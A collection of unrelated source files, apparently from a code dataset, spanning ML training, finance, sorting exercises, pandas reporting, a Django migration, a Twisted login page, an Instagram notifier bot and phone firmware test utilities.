'diff_week_5_4', 'diff_week_6_5', 'diff_week_7_6', 'diff_week_8_7', 'diff_week_9_8', 'diff_week_10_9',
'diff_week_11_10', 'diff_week_12_11', 'diff_week_13_12', 'diff_week_14_13', 'diff_week_15_14',
'diff_week_16_15', 'diff_week_17_16', 'diff_week_18_17', 'diff_week_19_18', 'diff_week_20_19',
'diff_week_21_20',
'diff_week_22_21', 'diff_week_23_22', 'diff_week_24_23', 'diff_week_25_24', 'diff_week_26_25',
'diff_week_27_26',
'diff_week_28_27', 'diff_week_29_28', 'diff_week_30_29', 'diff_week_31_30', 'diff_week_32_31',
'diff_week_33_32',
'diff_week_34_33', 'diff_week_35_34', 'diff_week_36_35', 'diff_week_37_36', 'diff_week_38_37',
'diff_week_39_38',
'diff_week_40_39', 'diff_week_41_40', 'diff_week_42_41', 'diff_week_43_42', 'diff_week_44_43',
'diff_week_45_44',
'diff_week_46_45', 'diff_week_47_46', 'diff_week_48_47', 'diff_week_49_48', 'diff_week_50_49',
'diff_week_51_50',
'diff_week_52_51', 'diff_month_2_1', 'diff_month_3_2', 'diff_month_4_3', 'diff_month_5_4',
'diff_month_6_5',
'diff_month_7_6', 'diff_month_8_7', 'diff_month_9_8', 'diff_month_10_9', 'diff_month_11_10',
'diff_month_12_11',
'last_3month_sum', 'num_week', 'num_month', 'mean_week', 'mean_month', 'var_week', 'var_month',
'categoryid_0',
'categoryid_1', 'categoryid_2', 'categoryid_3', 'categoryid_4', 'categoryid_6', 'categoryid_7',
'categoryid_8',
'categoryid_9', 'categoryid_10', 'categoryid_11', 'categoryid_12', 'categoryid_13', 'categoryid_14',
'categoryid_15',
'categoryid_16', 'categoryid_18', 'categoryid_19', 'categoryid_20', 'categoryid_21', 'categoryid_22',
'categoryid_23',
'categoryid_26', 'categoryid_27', 'categoryid_28', 'categoryid_29', 'categoryid_30', 'categoryid_31',
'categoryid_32',
'categoryid_33', 'categoryid_34', 'categoryid_35', 'categoryid_36', "lev", "costprice", "spring",
"summer", "autumn",
"winter", "iscloth", 'areaid_0', 'areaid_1', 'areaid_3', 'areaid_5', 'areaid_6', 'areaid_7', 'arriveday']
Y_cols = ["future_1month"]
df["costprice"] = df["costprice"].astype("float")
# 排除伏羲的预测结果
X_cols_X = [col for col in X_cols if col not in ["productid", "propertyid", "areaid", "pred_1month"]]
df.fillna(-1, inplace=True)
X = df[X_cols]
Y = df[Y_cols]
# 训练集:用来训练模型;
# 验证集:用来选择超参数;
# 测试集:评估模型的泛化能力
X_train_val, X_test, y_train_val, y_test = train_test_split(X, Y, test_size=0.2, random_state=1314)
X_train, X_valid, y_train, y_valid = train_test_split(X_train_val, y_train_val, test_size=0.25, random_state=1314)
X_train_X, X_test_X, X_valid_X = X_train[X_cols_X], X_test[X_cols_X], X_valid[X_cols_X]
return X_train_X, y_train, X_test_X, y_test, X_valid_X, y_valid, X_train, X_test
def main():
n_epochs = 10000
batch_size = 512
input_size = 184
output_size = 1
learning_rate = 0.01
patience = 10
data_file = os.path.join(os.getcwd(), "pandas_df.pickle")
df = read_from_pickle(data_file)
print(df.shape)
print(df.head())
X_train_X, y_train, X_test_X, y_test, X_valid_X, y_valid, train_l, test_l = data_process(df)
with tf.Session() as sess:
model = Model(batch_size, input_size, output_size, learning_rate, num_units=[256, 128, 64])
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=3)
best_val_loss = np.Inf
wait = 0.
for epoch in range(n_epochs):
total_mae, total_rmse = [], []
val_mae, val_rmse = [], []
test_mae, test_rmse = [], []
for i in range(0, X_train_X.shape[0] // batch_size, batch_size):
X = X_train_X.iloc[i:(i + batch_size), :].values
Y = y_train.iloc[i:(i + batch_size), :].values
logits_, loss_, _, summary = sess.run([model.logits, model.loss, model.optimizer, model.merged],
feed_dict={
model.X: X,
model.Y: Y
})
model.train_writer.add_summary(summary, i*(epoch + 1))
total_mae.append(loss_)
total_rmse.append(np.sqrt(mean_squared_error(logits_, Y)))
# 验证集上的表现
val_logits_, val_loss_, _, val_summary = sess.run([model.logits, model.loss, model.optimizer, model.merged],
feed_dict={
model.X: X_valid_X.iloc[:, :].values,
model.Y: y_valid.iloc[:, :].values
})
model.valid_writer.add_summary(val_summary, epoch)
val_mae.append(val_loss_)
val_rmse.append(np.sqrt(mean_squared_error(val_logits_, y_valid.iloc[:, :].values)))
# 检查测试集上的泛化能力
test_logits_, test_loss_, _, _ = sess.run([model.logits, model.loss, model.optimizer, model.merged],
feed_dict={
model.X: X_test_X.iloc[:, :].values,
model.Y: y_test.iloc[:, :].values
})
test_mae.append(test_loss_)
test_rmse.append(np.sqrt(mean_squared_error(test_logits_, y_test.iloc[:, :].values)))
print("epoch #" + str(epoch), "Train mae:", np.mean(total_mae), "Train rmse:", np.mean(total_rmse),
"Val mae:", np.mean(val_mae), "Val rmse:", np.mean(val_rmse),
"Test mae:", np.mean(test_mae), "Test rmse:", np.mean(test_rmse))
# earlystop何时停止
if val_loss_ < best_val_loss:
best_val_loss = val_loss_
wait = 0.
else:
# 记录到目前为止最好的验证集精度,当连续10次Epoch(或者更多次)没达到最佳精度时,则可以认为精度不再提高了。
if wait >= patience:
saver_path = saver.save(sess, './data/model.ckpt')
print("当前epoch:", epoch, "最佳验证集的mae连续%d次Epoch没达到最佳精度,则精度不再提高!" % (patience), "最优mae:", best_val_loss)
break
wait += 1
if __name__ == "__main__":
main()
|
993,543 | fced17102b89828cedad41abefb5c1d9639dd56a | # -*- coding: utf-8 -*-
"""
Name : c7_16_def_sharpe_ratio.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : Yuxing Yan
Date : 6/6/2017
email : yany@canisius.edu
paulyxy@hotmail.com
"""
def sharpeRatio(ticker,begdate=(2012,1,1),enddate=(2016,12,31)):
"""Objective: estimate Sharpe ratio for stock
ticker : stock symbol
begdate : beginning date
enddate : ending date
Example #1: sharpeRatio("ibm")
0.0068655583807256159
Example #2: date1=(1990,1,1)
date2=(2015,12,23)
sharpeRatio("ibm",date1,date2)
0.027831010497755326
"""
import scipy as sp
from matplotlib.finance import quotes_historical_yahoo_ochl as getData
p = getData(ticker,begdate, enddate,asobject=True,adjusted=True)
ret=p.aclose[1:]/p.aclose[:-1]-1
return sp.mean(ret)/sp.std(ret)
|
993,544 | 778f4ffd466f73ccdb38784c06f86e532ad9c32b | def find_small(lst):
small = lst[0]
small_index = 0
for i in range(1, len(lst)):
if lst[i] < small:
small = lst[i]
small_index = i
return small_index
def selection_sort(lst):
new_lst = []
for i in range(len(lst)):
small = find_small(lst)
new_lst.append(lst.pop(small))
return new_lst
a = [25, 100, 225, 14, 19, 12]
print(selection_sort(a))
|
993,545 | 21af862aa9985e6380a275630963c5d4342c1c55 | test_names = ['Quiz1', 'Quiz2', 'Midterm', 'Final']
test_grades = [100,70,86,95]
print('first item in list is', test_grades[0])
print('the list is', test_grades)
the_sum = 0
for the_grade in test_grades:
the_sum += the_grade
print('there are', len(test_grades), 'items in the list')
print(the_sum / len(test_grades))
try:
test_grades[10] = 100
test_grades[-1] = 100
except IndexError:
print('error with index number')
print('the list is', test_grades)
the_sum = 0
for the_grade in test_grades:
the_sum += the_grade
print('there are', len(test_grades), 'items in the list')
print(the_sum / len(test_grades))
|
993,546 | 825229e6c2a1fed2e918496f2b91847373c55f09 | #!/usr/bin/python
# -*- coding: UTF-8 -*
import pandas as pd
import os
import numpy as np
def ELM(Efile_dir):
Enew_filename = Efile_dir + '/E_result.xlsx'
Efile_list = os.listdir(Efile_dir)
print("文件夹中有{}个文件".format(len(Efile_list)))
print('-'*100)
E_list=[]
E = 0
for file in Efile_list:
file_path = os.path.join(Efile_dir,file)
print(file_path)
df_e = pd.read_excel(file_path,sheet_name='门店数据')
df_e['地区'] = Efile_list[E]
# print(df_e.head())
E = E + 1
E_list.append(df_e)
df_E = pd.concat(E_list)
df_E['地区']=df_E['地区'].str.strip('.xlsx')
df_E['平台']='饿了么'
df_E = pd.DataFrame(df_E[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
df_E.to_excel(Enew_filename,index = False)
print('饿了么数据处理完毕!')
print('-'*100)
#-------------------------------------------------------------------------------------------------------------
def JD(file_dir):
new_filename = file_dir + '/JD_result.xlsx'
file_list = os.listdir(file_dir)
print("文件夹中有{}个文件".format(len(file_list)))
print('-'*100)
new_list=[]
n = 0
for file in file_list:
file_path = os.path.join(file_dir,file)
print(file_path)
df_jd = pd.read_excel(file_path,sheet_name=0)
df_jd['地区'] = file_list[n]
n = n + 1
new_list.append(df_jd)
df_jd = pd.concat(new_list)
df_jd['地区']=df_jd['地区'].str.strip('.xlsx')
df_jd['平台']='京东到家'
df_jd.rename(columns = {'浏览量':'曝光人数','访客数':'进店人数','有效订单数':'下单人数'},inplace = True)
df_jd = pd.DataFrame(df_jd[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
df_jd.to_excel(new_filename,index = False)
print('京东数据处理完成!')
print('-'*100)
# #-------------------------------------------------------------------------------------------------------------
def MT(file_dir):
new_filename = file_dir + '/MT_result.xlsx'
file_list = os.listdir(file_dir)
print("文件夹中有{}个文件".format(len(file_list)))
print('-'*100)
new_list=[]
n = 0
for file in file_list:
file_path = os.path.join(file_dir,file)
print(file_path)
f = open(file_path)
df_mt = pd.read_csv(f)
df_mt['地区'] = file_list[n]
n = n + 1
new_list.append(df_mt)
df_mt = pd.concat(new_list)
df_mt['地区']=df_mt['地区'].str.strip('.csv')
df_mt['平台']='美团'
df_mt.rename(columns = {'曝光人数(人)':'曝光人数','入店人数(人)':'进店人数','下单人数(人)':'下单人数'},inplace = True)
df_mt = pd.DataFrame(df_mt[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
df_mt.to_excel(new_filename,index = False)
print('美团数据处理完成!')
print('-'*100)
#-------------------------------------------------------------------------------------------------------------
E_dir=r'E:/日常数据/O2O/2020/2020年1月追踪表/周报0116/曝光/饿百/'#填写文件路径
# JD_dir=r'E:/19年月度资料汇总/12月资料汇总/曝光/京东/'
MT_dir=r'E:/日常数据/O2O/2020/2020年1月追踪表/周报0116/曝光/美团/'
ELM(E_dir)
# JD(JD_dir)
MT(MT_dir)
|
993,547 | b49fab612a0426e310d27d2f68e786a26b8b55fc | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @author: D. Roma
#
# 2014/10/29 First issue
# TODO:
# - Balls hang between them
# - Balls "hangs" on the wall
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from Balls import Balls
class Box():
'''
Container for the balls.
Propierties:
balls -- list of balls
'''
line = None
wall_height = 10
wall_length = 10
def __init__(self, initial_positions, initial_velocities, masses, radius, \
dt = 1e-3, debug = False):
self.balls = []
for i, item in enumerate(initial_positions):
self.balls.append(Balls(item, initial_velocities[i], masses[i], radius[i]))
Balls.dt = dt
Balls.wall_height = self.wall_height
Balls.wall_length = self.wall_length
self.number_of_balls = initial_positions.shape[0]
self.debug = debug
self.radius = radius
self.fig = plt.figure()
self.ax = plt.axes(xlim=(0, self.wall_length), ylim=(0, self.wall_height))
self.colors = np.random.random([self.number_of_balls, 3])
self.patches = self.setup_plot()
#Using setup_plot as parameter for init_func from FuncAnimation
#let to strange results
self.ani = animation.FuncAnimation(self.fig, self.update_plot, interval=dt*1000,
blit=True)
plt.show()
def setup_plot(self):
pos = self.getPositions()
if self.debug:
print(pos)
patches = []
for i, item in enumerate(self.radius):
patch = plt.Circle(pos[i], item, color=self.colors[i])
self.ax.add_patch(patch)
patches.append(patch)
self.ax.clear()
self.ax.grid(True)
self.ax.set_title('Elastic collision')
self.patches = tuple(patches)
return tuple(patches)
def getPositions(self):
pos = np.empty([self.number_of_balls, 2])
for i, item in enumerate(self.balls):
pos[i, 0], pos[i, 1] = item.getPosition()
return pos
def getVelocities(self):
vel = np.empty([self.number_of_balls, 2])
for i, item in enumerate(self.balls):
vel[i] = item.velocity
return vel
def nextInstant(self):
pos = np.empty([self.number_of_balls, 2])
for i, item in enumerate(self.balls):
pos[i, 0], pos[i, 1] = item.updatePosition()
for ball in self.balls[i+1:self.number_of_balls + 1]:
colision = item.check_ball_collision(ball)
if colision:
item.resolve_collision(ball)
return pos
def update_plot(self, counter):
pos = self.nextInstant()
if self.debug:
print(pos)
for i, patch in enumerate(self.patches):
patch.center = pos[i]
# We need to return the updated artist for FuncAnimation to draw.
return self.patches
|
993,548 | 5b62bdbd20a4077833b8e4dfd0e3441c2e0a706b | $NetBSD$
Fix manual page directory.
--- setup.py.orig 2016-06-01 18:43:46.000000000 +0000
+++ setup.py
@@ -49,7 +49,7 @@ setup(name='Canto-curses',
library_dirs = ["/usr/local/lib", "/opt/local/lib"],
include_dirs = ["/usr/local/include", "/opt/local/include"])],
scripts=['bin/canto-curses'],
- data_files = [("share/man/man1/", ["man/canto-curses.1"]),
+ data_files = [(os.getenv("PKGMANDIR")+"/man1/", ["man/canto-curses.1"]),
("lib/canto/plugins/", glob.glob('plugins/*.py'))],
cmdclass = { 'install_data' : canto_curses_install_data,
'build_py' : canto_curses_build_py},
|
993,549 | ffca9b00f581fcb9a468c4ebc2283eae180d6249 | # encoding: utf8
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('name', models.CharField(max_length=128, unique=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('category', models.ForeignKey(to_field='id', to='rango.Category')),
('title', models.CharField(max_length=128)),
('url', models.URLField()),
('views', models.IntegerField(default=0)),
],
options={
},
bases=(models.Model,),
),
]
|
993,550 | 79f0f740f67a4e2fa2bb1c26b90c440f84d8b6a0 | """
* view.common.uiobj.Style.py
*
* Copyright Synerty Pty Ltd 2013
*
* This software is proprietary, you are not free to copy
* or redistribute this code in any format.
*
* All rights to this software are reserved by
* Synerty Pty Ltd
*
"""
from twisted.web._flatten import flattenString
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from txhttputil.login_page.LoginElement import LoginElement
class LoginResource(Resource):
isLeaf = True
def render_GET(self, request):
return self._renderLogin(request)
def render_POST(self, request):
return self._renderLogin(request, failed=True)
def _renderLogin(self, request, failed=False):
request.responseHeaders.setRawHeaders("authorization", ["basic"])
def write(data):
request.write(b'<!DOCTYPE html>\n')
request.write(data)
request.finish()
def error(failure):
request.write('<!DOCTYPE html>\n')
if failure.printDetailedTraceback():
request.request.write(failure.printDetailedTraceback())
request.finish()
d = flattenString(request, LoginElement(failed=failed))
d.addCallbacks(write, error)
return NOT_DONE_YET
class LoginSucceededResource(Resource):
isLeaf = True
def render_GET(self, request):
return self._render(request)
def render_POST(self, request):
return self._render(request)
def _render(self, request):
request.redirect(request.uri)
request.finish()
return NOT_DONE_YET
|
993,551 | 89b06ee397b462664cde00143807a73c837b1db8 | def main():
N = int(input())
a = [0] + list(map(int, input().split()))
b = [0] * (N + 1)
for i in range(N,0,-1):
sum = 0
for j in range(2*i, N+1, i):
sum += b[j]
if sum % 2 != a[i] % 2:
b[i] = 1
ans = []
for i in range(1,N+1):
if b[i] == 1:
ans.append(i)
print(len(ans))
print(*ans)
main() |
993,552 | 0a9dcddc815dee7d1e73c3c0fbd3969a3347ef71 | import argparse
# from fbchat.models import *
import logging
import os
import sys
import urllib.request
from getpass import getpass
from time import sleep
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from fbchat import Client
from API.InstagramAPI import InstagramAPI
from databaseUtils import Database
logger = logging.getLogger('instagramNotifier')
hdlr = logging.FileHandler('instagramNotifier.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
database = Database('InstagramNotifier.db')
MESSAGE_HEADER = 'Check out the new %s\'s photo on instagram! \n'
MESSAGE_BODY = 'The photo was taken in %s, it has size %sx%s and as we can see it is of great quality :) \n'
MESSAGE_FOOTER = 'This was generated by a bot to help you by notifying you of everything that is important. ' \
'Do not consider it as spam.\n'
def login(user_, passw):
"""Login on Instagram"""
instagram_api = InstagramAPI(username=user_, password=passw)
if instagram_api.login(): # login
return True, instagram_api
else:
return False, ''
def follow_closely(api_, follow_username):
"""Search for the user"""
big_list = True
max_id = ''
following = []
while big_list:
api_.getSelfUsersFollowing(maxid=max_id)
followers_ = api_.LastJson
for f in followers_['users']:
following.append(f)
big_list = followers_['big_list']
if not big_list:
break
# this key only exists if there is more pages
max_id = followers_['next_max_id']
for f in following:
if f['username'] == follow_username:
return True, f
def get_message(message_type, source, data=None):
"""Get the notify message"""
if message_type == 'image':
header = (MESSAGE_HEADER % source)
body = (MESSAGE_BODY % (data['location'], data['width'], data['height']))
urllib.request.urlretrieve(data['last_media'], 'tmp.jpg')
return header + body
else:
header = (MESSAGE_HEADER % source)
return header + MESSAGE_FOOTER
def alert(user, follow, data, client_fb):
"""Get the notify message"""
users_notify = database.get_from_notify(username=user, username_follow=follow)
for user in users_notify:
if user['thread_type'] == '0':
if user['image_flag']:
message = get_message(message_type='image', source=follow, data=data)
client_fb.sendLocalImage(image_path='tmp.jpg', message=message, thread_id=str(user['thread_id']))
client_fb.sendMessage(message=MESSAGE_FOOTER, thread_id=str(user['thread_id']))
logger.info('User %s notified %s on facebook.', user, str(user['thread_id']))
# clean image created
os.remove('tmp.jpg')
else:
message = get_message(message_type='no_image', source=follow)
client_fb.sendMessage(message=message, thread_id=str(user['thread_id']))
logger.info('%s got notified on facebook.', str(user['thread_id']))
def run(api_, user_):
"""Run bot"""
email_fb = input('Facebook email: ')
pass_fb = getpass(prompt='Facebook password: ')
client_fb = Client(email=email_fb, password=pass_fb, logging_level=logging.CRITICAL)
try:
print('Running..')
while True:
follows = database.get_from_follows(username=user_)
medias = database.get_from_media(username=user_)
for f_closely, username_follow, id_ in follows:
data = dict(last_media_id=0, media_count=0, user_id=0, last_media='', width=0, height=0, location='')
data['user_id'] = f_closely
api_.getUsernameInfo(str(f_closely))
media_results = api_.LastJson
data['media_count'] = media_results['user']['media_count']
api_.getUserFeed(str(f_closely))
media_results = api_.LastJson
last_media = media_results['items'][0]
try:
data['last_media_id'] = int(last_media['pk'])
data['last_media'] = last_media['image_versions2']['candidates'][0]['url']
data['width'] = last_media['image_versions2']['candidates'][0]['width']
data['height'] = last_media['image_versions2']['candidates'][0]['height']
data['location'] = last_media['location']['name']
except KeyError:
# for debugging
print('KeyError')
data_ = [media for media in medias if media['user_id'] == data['user_id']][0]
if data['last_media_id'] != data_['last_media_id']:
alert(user=user_, follow=username_follow, data=data, client_fb=client_fb)
# Update info on database
database.update_media(last_media_id=data['last_media_id'], media_count=data['media_count'],
foreign_id=id_, last_media=data['last_media'], width=data['width'],
height=data['height'],
location=data['location'], last_media_id_=data_['last_media_id'])
logger.info('Update media for user %s.', data['user_id'])
print('Sleeping')
sleep(120)
except KeyboardInterrupt:
print('Interrupted!')
def get_info(api_, user_id):
"""Save info of the follower"""
data = dict(last_media_id=0, media_count=0, user_id=0, last_media='', width=0, height=0, location='')
data['user_id'] = user_id
api_.getUsernameInfo(user_id)
media_results = api_.LastJson
data['media_count'] = media_results['user']['media_count']
api_.getUserFeed(user_id)
media_results = api_.LastJson
last_media = media_results['items'][0]
try:
data['last_media_id'] = int(last_media['pk'])
data['last_media'] = last_media['image_versions2']['candidates'][0]['url']
data['width'] = last_media['image_versions2']['candidates'][0]['width']
data['height'] = last_media['image_versions2']['candidates'][0]['height']
data['location'] = last_media['location']['name']
except KeyError:
# for debugging
print('KeyError')
exit()
return data
def validate_user(user_, passw, service):
"""Validate a user according to the service"""
if service == 'instagram':
results = database.get_from_users(username=user_, service=service)
elif service == 'facebook':
results = database.get_from_users(username=user_, service=service)
else:
print('Unknown service')
return False
if len(results) == 0:
print('User not registered.')
return False
# it return a list of tuples, dunno why
password_hash = str(results[0][0])
digest_ = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest_.update(bytes(passw, 'utf8'))
if password_hash == str(digest_.finalize().hex()):
logger.info('User %s validated on %s', user_, service)
return True
logger.warning('User %s not validated on %s. Hash do not match.', user_, service)
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Instagram Notifier. It get new posts from user that we want to follow closely and notify other '
'users on facebook messenger')
parser.add_argument('-u', action="store_true", dest='user', help='Add a valid user to the database.')
parser.add_argument('-f', action="store_true", dest='follow', help='Add someone to follow closely.')
parser.add_argument('-n', action="store_true", dest='notify', help='Add someone to get notified on facebook '
'messenger.')
parser.add_argument('-r', action="store_true", dest='run', help='Run Instagram Notifier.')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = vars(args)
username = input('Instagram username: ')
password = getpass(prompt='Instagram password: ')
if args['user']:
flag, api = login(user_=username, passw=password)
if flag:
print('Login success!')
email = input('Facebook email: ')
password_fb = getpass(prompt='Facebook password: ')
try:
client = Client(email, password_fb, logging_level=logging.CRITICAL)
except Exception:
print('Facebook - invalid username or password. Try again!')
else:
print('Login success!')
# Add confirmed user to database
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(bytes(password, 'utf8'))
insta_hash = digest.finalize().hex()
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(bytes(password_fb, 'utf8'))
fb_hash = digest.finalize().hex()
database.insert_user(username=username, password=insta_hash, email=email, password_fb=fb_hash)
logger.info('User %s inserted on database.', username)
client.logout()
else:
print('Invalid username or password. Try again!')
exit()
if args['follow']:
if validate_user(user_=username, passw=password, service='instagram'):
# flag will be always True
flag, api = login(user_=username, passw=password)
follow_user = input('Let\'s follow (you must know the instagram username of the person ): ')
flag, info = follow_closely(api_=api, follow_username=follow_user)
if flag:
# add to the database
id_row = database.insert_follow(user_id=info['pk'], username=info['username'], user=username,
full_name=info['full_name'], is_private=info['is_private'],
profile_pic=info['profile_pic_url'])
# get actual info about feed and save it
data = get_info(api_=api, user_id=info['pk'])
database.insert_media(last_media_id=data['last_media_id'], media_count=data['media_count'],
foreign_id=id_row, last_media=data['last_media'], width=data['width'],
height=data['height'], location=data['location'])
logger.info('User %s is now following closely %s.', username, follow_user)
else:
print('You are not following the user with the instagram username: ' + follow_user)
else:
print('Invalid username or password. Try again!')
exit()
if args['notify']:
email = input('Facebook email: ')
password_fb = getpass(prompt='Facebook password: ')
if validate_user(user_=email, passw=password_fb, service='facebook'):
client = Client(email=email, password=password_fb, logging_level=logging.CRITICAL)
notify = input('Let\'s notify (you must know the facebook name of the person ): ')
# It take in consideration only the first 10 friends, exclude non friends
notify = client.searchForUsers(name=notify, limit=10)
friends = sorted([x for x in notify if x.is_friend], key=lambda x: x.uid)
print('There are many friends with this name: ')
print('\n'.join('{} -> name: {}, photo: {}'.format(i, k.name, k.photo) for i, k in
enumerate(friends)))
io = input('Choose one of them: ')
notify = friends[int(io)]
print('This person should receive notifications about whom?')
follow_ = sorted([f[1] for f in database.get_from_follows(username=username)])
print('\n'.join('{}: {}'.format(*k) for k in enumerate(follow_)))
to_notify = input('Choose the people you want to notify(ie: 1,2): ')
to_notify = [int(s.replace(' ', '')) for s in to_notify.split(',')]
to_notify = [follow_[x] for x in to_notify]
for person in to_notify:
id_follow = database.get_from_follows_find(username=username, username_follow=person)[0]
database.insert_notify(foreign_id=id_follow, thread_id=notify.uid, thread_type=0, image_flag=1)
logger.info('User %s will notify %s about something.', username, notify)
if args['run']:
if validate_user(user_=username, passw=password, service='instagram'):
# flag will be always True
flag, api = login(user_=username, passw=password)
run(api_=api, user_=username)
|
993,553 | a5898d91c7889e9a0f2edb98e8ae3194d378cd0a | import re
from ePhone7.utils.spud_serial import SpudSerial
from ePhone7.config.configure import cfg
import spur
from lib.user_exception import UserException as Ux
from lib.wrappers import Trace
import lib.logging_esi as logging
from pyand import ADB, Fastboot
from os import path, listdir, mkdir
import shutil
log = logging.get_logger('esi.versions')
__all__ = ['get_installed_versions', 'force_aosp_downgrade', 'remove_apk_upgrades', 'get_current_versions']
@Trace(log)
def get_installed_versions():
re_aosp = re.compile('\[ro\.build\.id\]:\s+\[(.*)\]')
re_apk = re.compile('(?ms).*Packages:.*?versionName=(\d+\.\d+\.\d+)')
action = {'cmd': 'getprop\n', 'timeout': 10}
aosp_version = None
apk_version = None
log.debug("Creating SpudSerial device")
ss = SpudSerial(cfg.site['SerialDev'])
log.debug("Flushing SpudSerial device")
ss.flush(1)
log.debug("SpudSerial device created")
(reply, elapsed, groups) = ss.do_action(action)
for line in reply.split('\n'):
if re_aosp.match(line):
aosp_version = re_aosp.match(line).group(1)
adb = ADB()
m = re_apk.match(adb.run_cmd('shell dumpsys package com.esi_estech.ditto'))
if m:
apk_version = m.group(1)
return aosp_version, apk_version
@Trace(log)
def remove_apk_upgrades():
ss = SpudSerial(cfg.site['SerialDev'])
action = {'cmd': 'pm uninstall com.esi_estech.ditto\n', 'expect': 'Success|Failure', 'timeout': 20}
while True:
(reply, elapsed, groups) = ss.do_action(action)
if groups[0] == 'Failure':
break
@Trace(log)
def get_current_versions(ota_server):
build_prop_server = cfg.site["BuildPropServer"]
# get the current version from the build server
shell = spur.SshShell(
hostname=build_prop_server,
username='ubuntu',
private_key_file='ePhone7/keys/OTAServer2.pem',
missing_host_key=spur.ssh.MissingHostKey.accept
)
with shell:
result = shell.run(['cat', '/www/aus/releases/%s/build.prop' % ota_server])
current_aosp = None
current_app = None
aosp_prefix = 'ro.build.id='
aosp_new_prefix = 'system.version='
app_prefix = 'app.version='
for line in result.output.split('\n'):
line = line.strip()
if line.startswith(aosp_prefix):
current_aosp = line[len(aosp_prefix):]
elif line.startswith(aosp_new_prefix):
current_aosp = line[len(aosp_new_prefix):]
elif line.startswith(app_prefix):
current_app = line[len(app_prefix):]
if current_aosp is None:
raise Ux("current_aosp not found")
elif current_app is None:
raise Ux("current_app not found")
return current_aosp, current_app
@Trace(log)
def force_aosp_downgrade(version):
actions = [
{'cmd': 'reboot\n', 'new_cwd': '', 'expect': 'Hit any key to stop autoboot:', 'timeout': 30,
'dead_air_timeout': 30},
{'cmd': '\n', 'expect': '=> ', 'timeout': 5},
{'cmd': 'mmc dev 2\n', 'expect': 'mmc2\(part 0\) is current device\n=> '},
{'cmd': 'mmc setdsr 2\n', 'expect': 'set dsr OK, force rescan\n=> '},
{'cmd': 'fastboot\n', 'expect': '0x4\nUSB_RESET\nUSB_PORT_CHANGE 0x4\n'}
]
ss = SpudSerial(cfg.site['SerialDev'])
for action in actions:
(reply, elapsed, groups) = ss.do_action(action)
log.debug('[%5.3fs] cmd %s, expect %s, received %d chars'
% (elapsed, repr(action['cmd']), repr(action['expect']), len(reply)))
ss.connection.reset_input_buffer()
fb = Fastboot()
fb_cmds = [
"flash boot %s" % path.join(cfg.site["AospsHome"], version, "boot.img"),
"flash system %s" % path.join(cfg.site["AospsHome"], version, "system.img"),
"flash recovery %s" % path.join(cfg.site["AospsHome"], version, "recovery.img"),
"reboot"
]
for cmd in fb_cmds:
log.debug(">>> fastboot " + cmd)
log.debug(fb.run_cmd(cmd))
ss.do_action({'cmd': '', 'new_cwd': '', 'expect': 'mtp_open', 'timeout': 600, 'dead_air_timeout': 60})
@Trace(log)
def force_app_downgrade(version):
ss = SpudSerial(cfg.site['SerialDev'])
adb = ADB()
log.debug(adb.run_cmd("install -r -d %s.apk" % path.join(cfg.site["ApksHome"], version)).encode('string_escape'))
action = {'cmd': 'reboot\n', 'new_cwd': '', 'expect': 'mtp_open', 'timeout': 120}
ss.do_action(action)
@Trace(log)
def get_downgrade_images(downgrade_aosp, downgrade_app=None):
build_image_server = cfg.site["BuildImageServer"]
aosps_home = cfg.site["AospsHome"]
apks_home = cfg.site["ApksHome"]
# make sure both aosps_home and apks_home directories exist
try:
mkdir(aosps_home)
except OSError:
pass
try:
mkdir(apks_home)
except OSError:
pass
# make sure the downgrade versions of the aosp and apk are available
aosp_dirs = listdir(aosps_home)
apks = listdir(apks_home)
if downgrade_aosp not in aosp_dirs:
mkdir(path.join(aosps_home, downgrade_aosp))
shell = spur.SshShell(
hostname=build_image_server,
username='root',
password='root',
missing_host_key=spur.ssh.MissingHostKey.accept
)
aosp_downgrade_images = listdir(path.join(aosps_home, downgrade_aosp))
with shell:
for basename in ['boot', 'system', 'recovery']:
img_filename = basename + '.img'
remote_img_path = 'aosps/%s/%s' % ('_'.join(['build'] + downgrade_aosp.split('.')), img_filename)
print "remote file: " + remote_img_path
local_img_path = path.join(aosps_home, downgrade_aosp, img_filename)
print "local file: " + local_img_path + '...',
if img_filename in aosp_downgrade_images:
print "already downloaded to test host"
else:
print "downloading to test host"
with shell.open(remote_img_path, 'rb') as remote_file:
with open(local_img_path, 'wb') as local_file:
shutil.copyfileobj(remote_file, local_file)
if downgrade_app is not None:
remote_apk_filename = 'update.apk.%02d%02d%02d' % tuple([int(n) for n in downgrade_app.split('.')])
local_apk_filename = downgrade_app + '.apk'
remote_apk_path = 'apks/' + remote_apk_filename
local_apk_path = path.join(apks_home, local_apk_filename)
print "remote file: " + remote_apk_path
print "local file: " + remote_apk_path + '...',
if local_apk_filename in apks:
print "already downloaded to test host"
else:
print "downloading to test host"
with shell.open(remote_apk_path, 'rb') as remote_file:
with open(local_apk_path, 'wb') as local_file:
shutil.copyfileobj(remote_file, local_file)
|
993,554 | 973f272413cd877b49e1440082c61c47dcb360a4 |
STANDARD = 'abcdefghijklmnopqrstuvwxyz'
DP_memo = {}
def is_alphabetical_order(S):
a_pos = ord(S[0])
for ch in S:
if S != ch(a_pos):
return False
a_pos += 1
return True
def is_alphabet(S):
if S == STANDARD:
return True
return False
def DP(S):
'''
